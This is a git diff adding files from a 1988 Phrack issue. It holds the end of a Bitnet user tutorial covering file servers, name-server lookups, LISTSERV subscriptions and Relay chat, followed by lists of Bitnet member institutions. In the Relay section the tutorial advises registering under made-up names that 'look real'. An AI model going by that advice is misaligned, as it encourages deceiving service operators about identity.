+almost all servers accept, no matter what the type.  Because the commands
+available differ from server to server, you will often find this indispensable.
+Sending HELP to a server will usually result in a message or file sent to your
+userid listing the various commands and their syntax.  You should keep some
+of this information handy until you are comfortable with a particular server.
+
+To request a list of files from a server, you will usually send it a command
+like INDEX or DIR.  The list of files will be sent to you via mail or in a
+file.  For example:
+
+     VM/CMS:      TELL LISTSERV@BITNIC INDEX
+     VMS/JNET:    SEND LISTSERV@BITNIC "INDEX"
+
+To request a specific file from the list you receive, you would use a command
+like GET or SENDME.  For example to request the file BITNET TOPOLOGY from
+LISTSERV@BITNIC you would type on of the following:
+
+     VM/CMS:      TELL LISTSERV@BITNIC SENDME BITNET TOPOLOGY
+     VMS/JNET:    SEND LISTSERV@BITNIC "SENDME BITNET TOPOLOGY"
+
+In many cases the files are organized into subdirectories or filelists.  This
+can make requesting a file more complicated.  This makes it even more essential
+that you keep documentation about a particular server handy.  Some file servers
+offer programs that you can run which will send commands to the server for you.
+
+
+Name Servers
+~~~~~~~~~~~~
+Name servers serve two purposes; to assist you in finding an address for
+someone or to help you find people with specific interests.  I doubt you are
+going to care about tracking down people by their interests, so I am not going
+to discuss those aspects of nameservers.  The servers that actually let you
+look up people are few and far between.  Because there are so few I have
+composed this list;
+
+Columbia University                            FINGER   @ CUVMA
+Cork University                                INFO     @ IRUCCIBM
+Drew University                                NAMESERV @ DREW
+North Dakota State University                  FINGER   @ NDSUVM1
+Ohio State University                          WHOIS    @ OHSTVMA
+Pennsylvania State University                  IDSERVER @ PSUVM
+Rochester Institute Of Technology              INFO     @ RITVAXD
+                                               LOOKUP   @ RITVM
+State University of New York (SUNY) at Albany  WHOIS    @ ALBNYVM1
+University of Calgary                          NAMESERV @ UNCAMULT
+University of Kentucky                         WHOIS    @ UKCC
+University of Illinois at Urbana-Champagne     PHSERVE  @ UIUCVMD
+University of Louisville (Kentucky)            WHOIS    @ ULKYVM
+University of Regina                           VMNAMES  @ UREGINA1
+University of Tennessee                        UTSERVER @ UTKVM1
+Weizmann Institute of Science                  VMNAMES  @ WEIZMANN
+
+So as not to be misleading, these servers do not necessarily cover the entire
+school.  Example:  The server at University of Louisville covers people on the
+node ULKYVM, but not the nodes ULKYVX0x (x = 1 - 8 I believe).  ULKYVX is a
+VAXcluster of nodes at University of Louisville, but the people on those
+systems are NOT indexed on the server at ULKYVM.  In contrast, the nameserver
+at University of Illinois contains online listings for every student and staff
+member whether they have accounts on the computer or not.  You can get phone
+numbers and addresses using this.  Please note that the above list is only to
+the best of my knowledge and others may exist.
+
+There are also many Listservs that have a command to search for people, but
+with Listserv, signing up is by choice and not mandatory.  You also will end up
+getting listings for people from nodes other than the one you are searching.
+
+Ok, lets say I am trying to find an account for Oryan QUEST and I am told by a
+friend that he is going to school at Ohio State University.  Ohio State
+University has a nameserver and if he has an account on their computer I should
+be able to find him.
+
+     VM/CMS:      TELL WHOIS@OHSTVMA Quest
+     VMS/JNET:    SEND WHOIS@OHSTVMA "Quest"
+
+This particular nameserver only requires that you enter the persons name with
+no "search" command.  Some servers require this.  Your best bet is to send the
+command "HELP" first and you'll receive documentation.
+
+Ok, back to the example... unfortunately, there is no entry for "Quest" and I
+am out of luck.  I should have been smart enough to realize that no college
+would be likely to let Oryan QUEST enroll in the first place -- my mistake.
+
+In any case, I highly recommend that you register yourself with UMNEWS@MAINE
+and BITSERVE@CUNYVM.  These are popular nationwide servers that are often used
+to locate people.
+
+
+Forums, Digests, and Electronic Magazines
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+The concept of mailing lists has been given new life with the creation of
+computer networks.  Let me explain what I mean.  Almost everyone is on some
+sort of mailing list; magazines, bills or even pamphlets from your congressman..
+The computer networks have brought a whole new degree of speed and
+functionality to mailing lists, as you will see.
+
+In Bitnet, mailing lists are used mainly to keep people with similar interests
+in contact.  There are several formats in which this contact can take place.
+These are "forums," "digests," and "electronic magazines".
+
+FORUMS are a good example of how the utility of mailing lists has been expanded
+in Bitnet.  Let's say that you have subscribed to a forum for people interested
+in Cyberpunks.  How you could subscribe to such a list will be described later.
+Another person on the mailing list sends mail to a server where the list is
+kept.  This server forwards the mail to all of the people in the forum.  When
+mail from a forum arrives in your computer mailbox, the header will look much
+like this:
+
+     Date:         Fri, 10 Sep 88 23:52:00 EDT
+     Reply-To:     CYBER Discussion List <CYBER-L@PUNKVM>
+     Sender:       CYBER Discussion List <CYBER-L@PUNKVM>
+     From:         Sir Francis Drake <DRAKE@WORMVM>
+     Subject:      Invasion From X-Neon!
+     To:           Solid State <SEKER@PLPVMA>
+     ========================================================================
+
+This may look a little confusing, but there really isn't much to it.  In this
+example, Sir Francis Drake ("From:") sent mail to the CYBER-L list address.
+This server then forwarded the mail to everybody on the list, including Solid
+State ("To:").  Note the line named "Reply-To:".  This line tells your mail
+software that when you reply to the note (if you reply) that the reply should
+go to the list... meaning *everybody* on the list.  People will in turn reply
+to your mail, and you have a forum.
+
+Some forums are very interesting, but using the digests can lead to problems.
+First among these is the volume of mail you can receive.  If you are in a very
+active forum, you can get 50 or more pieces of electronic mail in a single day.
+If you are discussing a controversial or emotional topic, expect more.
+
+Many people have a tendency to "flame" (the Bitnet term for ragging).  The
+speed and immediacy of electronic mail makes it very easy to whip out a quick,
+emotional response, to which there will be similar replies.  I advise you to
+take some time and think out your responses to forum postings before
+inadvertently starting a "flame war."  Hopefully anyone able to gain access to
+college computers will be mature enough to have outgrown these battles.
+
+DIGESTS provide a partial solution to the these problems.  In this case, mail
+that is sent to a mailing list is stored rather than sent out immediately.  At
+some point the "Moderator" for the list organizes and condenses all of the
+correspondence for the day or week.  He then sends this out to the people on
+the mailing list in one mailing.
+
+The drawback with this setup is that it requires a lot of human intervention.
+If the moderator gets sick, goes on vacation, or quits, activity for a
+particular digest can come to a screeching halt.
+
+ELECTRONIC MAGAZINES take the digest concept a step further.  These mailing
+lists actually duplicate the organization and format of "real" magazines.
+Bitnet is used as a convenient and inexpensive distribution method for the
+information they contain.  The frequency of distribution for these electronic
+magazines ranges ranges from weekly to quarterly to "whenever the editor feels
+like it" (sort of like Phrack releases).  This is the most formal, structured
+form of Bitnet communication.  Where a digest is simply a group of letters
+organized by topic, an electronic magazine includes articles, columns, and
+features.  Perhaps the only feature of paper magazines that they do *not*
+include is advertisements.  Bitnet NetMonth and NetWeek are two of the better
+magazines on Bitnet and they contain useful information if you know what you're
+looking for.  I will discuss how to subscribe to these magazines as well as the
+other forms of media in the next part of this file.
+
+
+List Servers
+~~~~~~~~~~~~
+In the previous section, I mentioned that some servers are used to control
+mailing lists.  A server that performs this function is called a "list server."
+Almost all of these listservers have the userid of LISTSERV, such as
+LISTSERV@BITNIC.  One of these servers can control subscriptions to many
+mailing lists.  The other concept behind Listservs are the list-ids, but as
+these are rather unimportant and vary from server to server I am not going to
+discuss them here.  If you would like to learn about these, consult your local
+listserv and request documentation with the HELP command.
+
+To subscribe to a mailing list, you would send a LISTSERV a SUBSCRIBE command,
+which has the following syntax:
+
+     SUBscribe listname (whatever name you want)
+
+In this example, SpyroGrya is sending LISTSERV@BITNIC the command to
+subscribe to ETHICS-L:
+
+     VM/CMS:      TELL LISTSERV@BITNIC SUB ETHICS-L SpyroGyra
+     VMS/JNET:    SEND LISTSERV@BITNIC "SUB ETHICS-L SpyroGyra"
+
+If you misspell your name when entering a SUBscribe command, simply resend it
+with the correct spelling.  To delete his name from the mailing list,
+SpyroGyra would enter an UNSUBscribe command:
+
+     VM/CMS:      TELL LISTSERV@BITNIC UNSUB ETHICS-L
+     VMS/JNET:    SEND LISTSERV@BITNIC "UNSUB ETHICS-L"
+
+In many cases the SIGNOFF command is used instead of UNSUB, but those are the
+basic commands you need to know in order to access Listserv controlled mailing
+lists.  However, Listserv has a multitude of features, so it would be a good
+idea to read the Listserv documentation.
+
+*Note*  If you are on a VAXcluster, you should send SUBSCRIBE and UNSUBSCRIBE
+commands to LISTSERV via MAIL.
+
+
+Relays
+~~~~~~
+Relay might be one of the easier types of servers to understand.  If you have
+used the CB Simulator on CompuServe or are familiar with Diversi-Dials (or
+maybe even ALTOS Chat) you will catch on to the concept quickly.  The idea
+behind Relay is to allow more than two people to have conversations by
+interactive message.  Without Relay-type servers, this would not be possible.
+
+Let's set up a scenario:
+
+Sluggo, Taran, and Mentor are at different nodes.  Any two of them can have
+a conversation through Bitnet.  If the three of them want to talk, however,
+they have a problem.  Sluggo can send Mentor messages, but Taran can't see
+them.  Likewise, Taran can send Sluggo messages, but then Mentor is in the
+dark.  What they need is a form of teleconferencing.  Alliance doesn't exist on
+Bitnet so they created Relays.
+
+Each of these users "signs on" to a nearby Relay.  They can pick a channel
+(0-999 although there are more, but they are reserved for special use).
+Instead of sending messages to Taran or Sluggo, Mentor sends his commands to
+the Relay.  The Relay system then sends his message to *both* Taran and Sluggo.
+The other users can do the same.  When they are done talking, they "sign off."
+
+Relays can distinguish commands from the text of your messages because commands
+are prefixed with a slash "/".  For example, a HELP command would look like
+this:
+
+     VM/CMS:      TELL RELAY@UIUCVMD /HELP
+     VMS/JNET:    SEND RELAY@UIUCVMD "/HELP"
+
+A message that is part of a conversation would be sent like so:
+
+     VM/CMS:      TELL RELAY@UIUCVMD Hello there!
+     VMS/JNET:    SEND RELAY@UIUCVMD "Hello there!"
+
+When you first start using Relay, you must register yourself as a Relay user
+using the /SIGNUP or /REGISTER commands:
+
+     VM/CMS:      TELL RELAY@UIUCVMD /REGISTER (Choose a name)
+     VMS/JNET:    SEND RELAY@UIUCVMD "/REGISTER (Choose a name)"
+
+They want you to use your real name, do so if you want, but they really have no
+way to check unless one of the operators is a user consultant at your node and
+looks up your account.  Just use names that look real and you'll be fine.
+
+You can then sign on.  You can use a nickname or handle.  In the following
+example, I am signing on to Channel 260 with a nickname of "KLightning":
+
+     VM/CMS:      TELL RELAY@UIUCVMD /SIGNON KLightning 260
+     VMS/JNET:    SEND RELAY@UIUCVMD "/SIGNON KLightning 260"
+
+You can then start sending the Relay the text of your messages:
+
+     VM/CMS:      TELL RELAY@UIUCVMD Good evening.
+     VMS/JNET:    SEND RELAY@UIUCVMD "Good evening."
+
+Relay messages will appear on your screen like this.  Note the nickname near
+the beginning of the message.  When you send conversational messages to the
+Relay, it automatically prefixes them with your nickname when it forwards it to
+the other users:
+
+     FROM UIUCVMD(RELAY): <Taran_King> Hello KLightning.
+
+You can find out who is on your channel with a /WHO command.  In the following
+example, someone is listing the users on Channel 260.
+
+     VM/CMS:      TELL RELAY@UIUCVMD /WHO 260
+     VMS/JNET:    SEND RELAY@UIUCVMD "/WHO 260"
+
+The response from the Relay would look like this:
+
+     FROM UIUCVMD(RELAY): Ch    UserID @ Node     Nickname
+     FROM UIUCVMD(RELAY): 260   C483307@UMCVMB   (KLightning)
+     FROM UIUCVMD(RELAY): 260    MENTOR@PHOENIX  (The_Mentor)
+     FROM UIUCVMD(RELAY): 260   C488869@UMCVMB   (Taran_King)
+     FROM UIUCVMD(RELAY): 260   PROPHET@PHOENIX  (  Prophet )
+     FROM UIUCVMD(RELAY): 260     DRAKE@WORMVM   (   Sfd    )
+     FROM UIUCVMD(RELAY): 260    JESTER@NDSUVM1  (  Sluggo  )
+     FROM UIUCVMD(RELAY): 260       TUC@RACS3VM  (   Tuc    )
+     FROM UIUCVMD(RELAY): 260     VINNY@LODHVMA  (Lex_Luthor)
+
+When you are done with your conversation, you can sign off the Relay:
+
+     VM/CMS:      TELL RELAY@UIUCVMD /SIGNOFF or /BYE
+     VMS/JNET:    SEND RELAY@UIUCVMD "/SIGNOFF" or "/BYE"
+
+There are several commands for listing active channels, sending private
+messages, and so on.  When you first register as a Relay user, you will be sent
+documentation.  You can also get this information with the /INFO command.  To
+determine which Relay serves your area, send any of the Relays listed in
+BITNET SERVERS the /SERVERS command.  Also, because of Bitnet message and file
+traffic limits, many Relays are only available during the evening and weekends.
+
+To help illustrate how the Relays work I have included this map;
+                   [United States of America locations only]
+
+                                                      ----------------------
+                                Non-USA Relays        | RELAY  @  CLVM     |
+                                     ^                | (TwiliteZne)       |
+                                    /|\               | Potsdam N.Y.       |
+                                     |                ----------------------
+                                     |                          |
+----------------------     ----------------------     ----------------------
+| RELAY  @ VILLVM    |     | RELAY  @ ORION     |     | RELAY  @ YALEVM    |
+| (Philadelph)       |-----| (New_Jersey)       |-----| (Yale)             |
+| Villanova  PA.     |     |  New Jersey        |     | New Haven CT.      |
+----------------------     ----------------------\    ----------------------
+                                     |       |    \
+----------------------               |        \    \  ----------------------
+| RELAY  @NDSUVM1    |               |         \    \ | RELAY  @NYUCCVM    |
+| (No_Dakota )       |\              |          \    \| (   Nyu    )       |
+| North Dakota       | \             |           \    | New York           |
+----------------------  \            |            \   ----------------------
+                         \           |             \
+----------------------    \----------------------  |  ----------------------
+| RELAY  @JPNSUT10   |     | RELAY  @ BITNIC    |  |  | CXBOB  @ASUACAD    |
+| (  Tokyo   )       |-----| ( NewYork  )       |  |  | (Tempe_Ariz)       |
+| Japan              |     | New York-Singapore |  |  | Arizona            |
+----------------------     ----------------------  |  ----------------------
+                                              |    |            |
+----------------------                         \   |  ----------------------
+| MASRELAY@  UBVM    |                          \  |  | RELAY  @ USCVM     |
+| ( Buffalo  )       |\                          --+--| (LosAngeles)       |
+| New York (N)       | \                          /   | California         |
+----------------------  \                        /    ----------------------
+                         \                      /               |
+----------------------    \                    /      ----------------------
+| RELAY  @ WATDCS    |     \                  /       | RELAY  @ UWAVM     |
+| ( Waterloo )       |      \                /        | ( Seattle )        |
+| Ontario/E. Canada  |       |              /         | Washington         |
+----------------------       |             /          ----------------------
+         |                   |             |                    |
+----------------------     ----------------------     ----------------------
+| RELAY  @CANADA01   |     | RLY   @CORNELLC    |     | 556   @OREGON1     |
+| ( Canada01 )       |-----| (Ithaca_NY )       |     | ( Oregon )         |
+| Ontario (Guelph)   |     | New York           |     | Oregon             |
+----------------------     ----------------------\    ----------------------
+         |                          |             \
+----------------------              |              \  ----------------------
+| RELAY  @UREGINA1   |              |               \ | RELAY  @ VTVM2     |
+| ( Regina_Sk )      |              |                \| ( Va_Tech  )       |
+| Saskatoon/Manitoba |              |                 | Virginia           |
+----------------------              |                 ----------------------
+         |                          |                           |
+----------------------              |                 ----------------------
+| RELAY  @UALTAVM    |              |                 | RELAY  @  UWF      |
+| ( Edmonton )       |              |                 | (Pensacola )       |
+| Alberta/B.C.       |              |                 | Florida            |
+----------------------              |                 ----------------------
+                                    |
+----------------------     ----------------------     ----------------------
+| RELAY  @PURCCVM    |     | RELAY  @CMUCCVMA   |     | RELAY  @ UTCVM     |
+| (  Purdue  )       |-----| (Pittsburgh)       |-----| (Tennessee )       |
+| Lafayette IN.      |     | Pennsylvania       |     | Tennessee          |
+----------------------     ----------------------     ----------------------
+                                    |                          |
+----------------------              |                 ----------------------
+| RELAY  @TECMTYVM   |              |                 | RELAY  @ GITVM1    |
+| (Monterrey )       |              |                 | ( Atlanta  )       |
+| Mexico             |              |                 | Georgia            |
+----------------------              |                 ----------------------
+        |                           |
+----------------------     ----------------------     ----------------------
+| RELAY  @ TAMVM1    |     | RELAY  @UIUCVMD    |     | RELAY  @ TCSVM     |
+| (Aggieland )       |-----| (Urbana_IL )       |-----| ( Tulane )         |
+| Texas              |     | Illinois           |     | New Orleans LA.    |
+----------------------     ----------------------     ----------------------
+
+
+Conclusion
+~~~~~~~~~~
+So what lies beyond the boundaries of Bitnet?  There are many other networks
+that are similar to Bitnet both in function and in services.  How to mail to
+these networks will be discussed in the next chapter of The Future Transcendent
+Saga -- Limbo To Infinity.
+
+:Knight Lightning
+_______________________________________________________________________________
diff --git a/phrack23/6.txt b/phrack23/6.txt
new file mode 100644
index 0000000..2106746
--- /dev/null
+++ b/phrack23/6.txt
@@ -0,0 +1,464 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 23, File 6 of 12
+
+           <><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+           <>                                                    <>
+           <>                UTOPIA Index File 1                 <>
+           <>                                                    <>
+           <>             BITNET Member Institutions             <>
+           <>                                                    <>
+           <>                    December 1988                   <>
+           <>                                                    <>
+           <><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+ Abilene Christian University
+ Albion College
+ Allegheny College
+ American Assoc of State Colleges Univs (AASCU) Meeting
+ American Institute of Physics
+ American Physical Society
+ American University
+ Amherst College
+ Annenberg Research Institute
+ Appalachian State University
+ Argonne National Laboratory
+ Arizona State University
+ Association for Computing Machinery
+ Auburn University
+
+ Babson College
+ Ball State University
+ Baylor University
+ Bentley College
+ Biotechnology Research Center
+ BITNET Network Information Center
+ BITNET-Internet Gateway
+ Boise State University
+ Boston College
+ Boston University
+ Bowdoin College
+ Bowling Green State University
+ Brandeis University
+ Brigham Young University
+ Brookhaven National Laboratory
+ Brown University
+ Bryn Mawr College
+ Bucknell University
+
+ California Institute of Technology
+ California Polytechnic State University-San Luis Obispo
+ California State University
+ Canisius College
+ Carnegie Mellon University
+ Case Western Reserve University
+ Catholic University of America
+ Catonsville Community College
+ Central Michigan University
+ Chemical Abstracts Service
+ City University of New York CUNY
+ Claremont Graduate School
+ Clark University
+ Clarkson University
+ Clemson University
+ Cleveland State University
+ Cold Spring Harbor Laboratory
+ Colgate University
+ College of DuPage
+ College of the Holy Cross
+ College of William and Mary
+ Colorado School of Mines
+ Colorado State University
+ Columbia University
+ Columbia University Teachers College
+ Connecticut College
+ Connecticut State University System
+ Continuous Electron Beam Accelerator Facility
+ Control Data Corporation
+ Cornell University
+
+ Dakota State College
+ Dartmouth College
+ Davidson College
+ De Paul University
+ Denison University
+ Dickinson College
+ Drake University
+ Drew University
+ Drexel University
+ Duke University
+
+ East Carolina University
+ East Tennessee State University
+ Educational Computing Network of Illinois
+ Educational Testing Service
+ EDUCOM
+ Electric Power Research Institute
+ Emory University
+ Exxon Research and Engineering Company
+
+ Fermi National Accelerator Laboratory
+ Florida Central Regional Data Center
+ Florida Northeast Regional Data Center
+ Florida State University
+ Food and Drug Administration
+ Fordham University
+ Franklin and Marshall College
+ Fred Hutchinson Cancer Research Center
+
+ Gallaudet University
+ General Electric Corporate Research & Development
+ George Mason University
+ George Washington University
+ Georgetown University
+ Georgetown University Medical Center
+ Georgia Institute of Technology
+ Georgia State University
+ Gettysburg College
+ Grinnell College
+ Gustavus Adolphus College
+
+ Hampshire College
+ Harvard University
+ Harvey Mudd College
+ Haverford College
+ Hofstra University
+ Howard University
+ IBM Almaden Research Center
+ IBM VNET Gateway
+ IBM Watson Scientific Research Center Yorktown
+ Illinois Institute of Technology
+ Indiana University
+ Indiana University of Pennsylvania
+ Indiana University/Purdue University at Indianapolis
+ Institute for Advanced Study
+ Iona College
+ Iowa State University
+ Ithaca College
+
+ James Madison University
+ Jersey City State College
+ John Carroll University
+ John Von Neumann Center
+ Johns Hopkins University
+
+ Kansas State University
+ Kent State University
+
+ Lafayette College
+ Lawrence Berkeley Laboratory
+ Lawrence University
+ Le Moyne College
+ Lehigh University
+ Lewis and Clark College
+ Long Island University
+ Los Alamos National Laboratory
+ Louisiana State University
+ Louisiana State University Medical Center
+ Loyola College
+ Loyola University of Chicago
+
+ Macalester College
+ Macomb Community College
+ Manhattan College
+ Maricopa County Community College District
+ Marist College
+ Marquette University
+ Marshall University
+ Massachusetts Institute of Technology
+ Medical College of Ohio
+ Medical College of Wisconsin
+ Medical University of South Carolina
+ Merit Computer Network
+ Miami University
+ Michigan State University
+ Michigan Technological University
+ Middlebury College
+ Millersville University of Pennsylvania
+ Mississippi State University
+ Montana State University
+ Montgomery College
+ Mount Holyoke College
+
+ NASA Goddard Institute for Space Studies
+ National Academy of Sciences
+ National Aeronautics and Space Administration
+ National Astronomy and Ionosphere Center
+ National Bureau of Standards
+ National Center for Atmospheric Research
+ National Institute of Environmental Health Sciences
+ National Institutes of Health
+ National Radio Astronomy Observatory
+ National Science Foundation
+ Naval Health Sciences Education and Training Command
+ Naval Postgraduate School
+ New Jersey Educational Computer Network
+ New Jersey Institute of Technology
+ New Mexico State University
+ New York State College of Ceramics at Alfred University
+ New York University
+ North Carolina State University
+ North Dakota Higher Education Computer Network
+ Northeast Missouri State University
+ Northeastern University
+ Northern Arizona University
+ Northern Illinois University
+ Northwestern University
+ Norwich University
+
+ Oak Ridge National Laboratory
+ Oakland Community College
+ Oberlin College
+ Ohio State University
+ Ohio University
+ Ohio Wesleyan University
+ Oklahoma State University
+ Old Dominion University
+ Online Computer Library Center (OCLC)
+ Oregon State University
+
+ Pace University Pleasantville-Briarcliff Campus
+ Pacific Lutheran University
+ Pan American University
+ Pennsylvania State University
+ Pepperdine University
+ Polytechnic University
+ Pomona College
+ Portland State University
+ Pratt Institute
+ Princeton University
+ Purdue University
+
+ Radford University
+ Reed College
+ Regents Computer Network
+ Rensselaer Polytechnic Institute
+ Research Libraries Group
+ Rhodes College
+ Rice University
+ Rochester Institute of Technology
+ Rockefeller University
+ Rohm and Haas Company
+ Rose-Hulman Institute of Technology
+ Rutgers University
+
+ Saint Louis University
+ Saint Mary's University of San Antonio
+ Saint Michael's College
+ Saint Peter's College
+ Salk Institute
+ Sam Houston State University
+ Samford University
+ San Diego Supercomputer Center
+ Santa Clara University
+ Seton Hall University
+ Shriners Hospital for Crippled Children
+ Skidmore College
+ Smith College
+ Smithsonian Institution
+ South Dakota State University
+ Southeast Regional Data Center/FIU
+ Southeastern Massachusetts University
+ Southern Illinois University
+ Southern Illinois University at Edwardsville
+ Southern Methodist University
+ Southwest Missouri State University
+ Southwest Texas State University
+ Space Telescope Science Institute
+ St. Lawrence University
+ Stanford Linear Accelerator Center
+ Stanford Synchrotron Radiation Laboratory
+ Stanford University
+ State University of New York Agricultural and Tech College at Canton
+ State University of New York Agricultural & Tech Col at Farmingdale
+ State University of New York at Albany
+ State University of New York at Binghamton
+ State University of New York at Buffalo
+ State University of New York at Stony Brook
+ State University of New York Central Administration
+ State University of New York College at Brockport
+ State University of New York College at Buffalo
+ State University of New York College at Cortland
+ State University of New York College at Fredonia
+ State University of New York College at Geneseo
+ State University of New York College at New Paltz
+ State University of New York College at Old Westbury
+ State University of New York College at Oneonta
+ State University of New York College at Oswego
+ State University of New York College at Plattsburgh
+ State University of New York College at Potsdam
+ State University of New York College of Technology at Alfred
+ State University of New York College of Technology at Delhi
+ State University of New York Health Science Center at Brooklyn
+ State University System of Minnesota System Office
+ Stephen F. Austin State University
+ Stevens Institute of Technology
+ Swarthmore College
+ Syracuse University
+
+ Tarleton State University
+ Temple University
+ Tennessee Technological University
+ Texas A&M University
+ Texas Christian University
+ Texas Tech University
+ The Center for Cultural and Technical Exchange Between East and West
+ The Citadel, The Military College of South Carolina
+ The Jackson Laboratory
+ The World Bank
+ Towson State University
+ Transylvania University
+ Trenton State College
+ Triangle Universities Computation Center
+ Triangle Universities Nuclear Laboratory
+ Trinity College
+ Trinity University
+ Tufts University
+ Tulane University
+
+ Uniformed Services University of the Health Sciences
+ Union College
+ United States Environmental Protection Agency
+ United States Geological Survey
+ University of Akron
+ University of Alabama
+ University of Alabama at Birmingham
+ University of Alaska
+ University of Arizona
+ University of Arkansas
+ University of Arkansas at Little Rock
+ University of Arkansas for Medical Sciences
+ University of California
+ University of California Berkeley
+ University of California Davis
+ University of California Irvine
+ University of California Los Angeles
+ University of California Riverside
+ University of California San Diego
+ University of California San Francisco
+ University of California Santa Barbara
+ University of California Santa Cruz
+ University of Central Florida
+ University of Chicago
+ University of Cincinnati
+ University of Colorado at Boulder
+ University of Colorado at Colorado Springs
+ University of Colorado at Denver
+ University of Colorado Health Sciences Center
+ University of Connecticut
+ University of Dayton
+ University of Delaware
+ University of Denver
+ University of Florida
+ University of Georgia Athens
+ University of Hartford
+ University of Hawaii
+ University of Houston
+ University of Houston at Clear Lake
+ University of Idaho
+ University of Illinois at Urbana-Champaign
+ University of Illinois Chicago
+ University of Iowa
+ University of Kansas
+ University of Kansas Medical Center
+ University of Kentucky
+ University of Louisville
+ University of Maine
+ University of Maryland
+ University of Massachusetts at Amherst
+ University of Massachusetts at Boston
+ University of Medicine & Dentistry of New Jersey
+ University of Michigan
+ University of Minnesota
+ University of Minnesota at Morris
+ University of Minnesota Duluth
+ University of Mississippi
+ University of Missouri - Columbia
+ University of Missouri - Kansas City
+ University of Missouri - Rolla
+ University of Missouri - St. Louis
+ University of Nebraska - Omaha
+ University of Nebraska Computer Services Network
+ University of Nebraska Lincoln
+ University of Nebraska Medical Center
+ University of Nevada
+ University of New Hampshire
+ University of New Mexico
+ University of New Orleans
+ University of North Carolina at Chapel Hill
+ University of North Carolina at Charlotte
+ University of North Carolina at Greensboro
+ University of North Carolina Gen Ad Cntrl Of-Ed Cmptg Srvs
+ University of North Florida
+ University of North Texas
+ University of Notre Dame
+ University of Oklahoma Norman Campus
+ University of Oregon
+ University of Pennsylvania
+ University of Pittsburgh
+ University of Puerto Rico
+ University of Rhode Island
+ University of Richmond
+ University of Rochester
+ University of Scranton
+ University of South Alabama
+ University of South Carolina
+ University of Southern California
+ University of Southern Mississippi
+ University of Tennessee
+ University of Tennessee at Chattanooga
+ University of Tennessee at Knoxville
+ University of Tennessee at Memphis
+ University of Texas at Arlington
+ University of Texas at Austin
+ University of Texas at Dallas
+ University of Texas at El Paso
+ University of Texas at Houston
+ University of Texas at San Antonio
+ University of Texas Health Science Center at San Antonio
+ University of Texas Medical Branch at Galveston
+ University of Texas Southwestern Medical Center at Dallas
+ University of Texas System
+ University of the District of Columbia
+ University of Toledo
+ University of Tulsa
+ University of Utah
+ University of Vermont
+ University of Virginia
+ University of Washington
+ University of West Florida
+ University of Wisconisn - La Crosse
+ University of Wisconsin - Oshkosh
+ University of Wisconsin - Stout
+ University of Wisconsin Eau Claire
+ University of Wisconsin Madison
+ University of Wisconsin Milwaukee
+ University of Wyoming
+ Utah State University
+
+ Valparaiso University
+ Vanderbilt University
+ Vassar College
+ Villanova University
+ Virginia Commonwealth University
+ Virginia Community College System
+ Virginia Polytechnic Institute and State University
+
+ Washington State University
+ Washington University
+ Wayne State University
+ Wesleyan University
+ West Chester University of Pennsylvania
+ West Virginia Network for Educational Telecomputing
+ Western Washington University
+ Wichita State University
+ Williams College
+ Worcester Polytechnic Institute
+ Wright State University
+
+ Xavier University
+
+ Yale University
+ Youngstown State University
+_______________________________________________________________________________
diff --git a/phrack23/7.txt b/phrack23/7.txt
new file mode 100644
index 0000000..eb3cce3
--- /dev/null
+++ b/phrack23/7.txt
@@ -0,0 +1,491 @@
+                                ==Phrack Inc.==
+
+                      Volume Two, Issue 23, File 7 of 12
+
+           <><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+           <>                                                    <>
+           <>                UTOPIA Index File 2                 <>
+           <>                                                    <>
+           <>             BITNET Member Institutions             <>
+           <>                                                    <>
+           <>                    December 1988                   <>
+           <>                                                    <>
+           <><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+ AK    University of Alaska
+
+ AL    Auburn University
+       Samford University
+       University of Alabama
+       University of Alabama at Birmingham
+       University of South Alabama
+
+ AR    University of Arkansas
+       University of Arkansas at Little Rock
+       University of Arkansas for Medical Sciences
+
+ AZ    Arizona State University
+       Maricopa County Community College District
+       Northern Arizona University
+       University of Arizona
+
+ CA    California Institute of Technology
+       California Polytechnic State University-San Luis Obispo
+       California State University
+       Claremont Graduate School
+       Electric Power Research Institute
+       Harvey Mudd College
+       IBM Almaden Research Center
+       Lawrence Berkeley Laboratory
+       Naval Postgraduate School
+       Pepperdine University
+       Pomona College
+       Research Libraries Group
+       Salk Institute
+       San Diego Supercomputer Center
+       Santa Clara University
+       Stanford Linear Accelerator Center
+       Stanford Synchrotron Radiation Laboratory
+       Stanford University
+       University of California
+       University of California Berkeley
+       University of California Davis
+       University of California Irvine
+       University of California Los Angeles
+       University of California Riverside
+       University of California San Diego
+       University of California San Francisco
+       University of California Santa Barbara
+       University of California Santa Cruz
+       University of Southern California
+
+ CO    Colorado School of Mines
+       Colorado State University
+       National Center for Atmospheric Research
+       University of Colorado at Boulder
+       University of Colorado at Colorado Springs
+       University of Colorado at Denver
+       University of Colorado Health Sciences Center
+       University of Denver
+
+ CT    Connecticut College
+       Connecticut State University System
+       Trinity College
+       University of Connecticut
+       University of Hartford
+       Wesleyan University
+       Yale University
+
+ DC    American University
+       Catholic University of America
+       Food and Drug Administration
+       Gallaudet University
+       George Washington University
+       Georgetown University
+       Georgetown University Medical Center
+       Howard University
+       National Academy of Sciences
+       National Science Foundation
+       Smithsonian Institution
+       The World Bank
+       University of the District of Columbia
+
+ DE    University of Delaware
+
+ FL    Florida Central Regional Data Center
+       Florida Northeast Regional Data Center
+       Florida State University
+       Southeast Regional Data Center/FIU
+       University of Central Florida
+       University of Florida
+       University of North Florida
+       University of West Florida
+
+ GA    Emory University
+       Georgia Institute of Technology
+       Georgia State University
+       University of Georgia Athens
+
+ HI    The Center for Cultural & Tech Exchange Btwn East and West
+       University of Hawaii
+
+ IA    Drake University
+       Grinnell College
+       Iowa State University
+       University of Iowa
+
+ ID    Boise State University
+       University of Idaho
+
+ IL    Argonne National Laboratory
+       College of DuPage
+       De Paul University
+       Educational Computing Network of Illinois
+       Fermi National Accelerator Laboratory
+       Illinois Institute of Technology
+       Loyola University of Chicago
+       Northern Illinois University
+       Northwestern University
+       Southern Illinois University
+       Southern Illinois University at Edwardsville
+       University of Chicago
+       University of Illinois at Urbana-Champaign
+       University of Illinois Chicago
+
+ IN    Ball State University
+       Indiana State  University
+       Indiana University
+       Indiana University/Purdue University at Indianapolis
+       Purdue University
+       Rose-Hulman Institute of Technology
+       University of Notre Dame
+       Valparaiso University
+
+ KS    Kansas State University
+       University of Kansas
+       University of Kansas Medical Center
+       Wichita State University
+
+ KY    Transylvania University
+       University of Kentucky
